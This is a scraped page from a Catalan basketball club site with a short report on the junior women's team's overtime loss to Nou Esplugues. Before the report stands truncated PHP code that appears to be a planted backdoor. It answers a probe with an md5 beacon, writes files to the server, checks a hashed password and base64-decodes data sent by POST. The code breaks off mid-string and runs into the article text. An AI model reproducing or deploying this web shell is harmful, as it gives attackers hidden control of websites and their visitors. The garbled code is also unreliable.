function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení A paga car les seves errades - Tgn Bàsquet Club -

El júnior femení A paga car les seves errades

Updated: octubre 7, 2013

Debut amb derrota del júnior femení que va caure en la pròrroga contra un Nou Esplugues que va saber aprofitar el seu moment per endur-se un partit que va anar perdent durant més de tres quartes parts. Les liles van començar bé, amb bona circulació de pilota però les errades defensives van evitar que tinguéssin un avantatge més gran al final del primer quart (15-13).  Amb tot, el joc excessivament lent de les locals van permetre l’Esplugues estar a l’aguait i poder capgirar el resultat en el tercer quart (35-37). El TGN Bàsquet va provar de reaccionar des de la defensa però els seus atacs continuaven sent imprecisos i això va provocar una certa igualtat en el tempteig. En el tram final les liles van notar molt negativament el seu pobre encert en els tirs lliures, doncs en van fallar 28 durant tot el partit, i això va permetre les visitants empatar el matx i forçar la pròrroga.  El temps extra va ser un martiri pel TGN Bàsquet que havia pagat car les seves errades i d’això l’Esplugues se’n va aprofitar per guanyar el matx.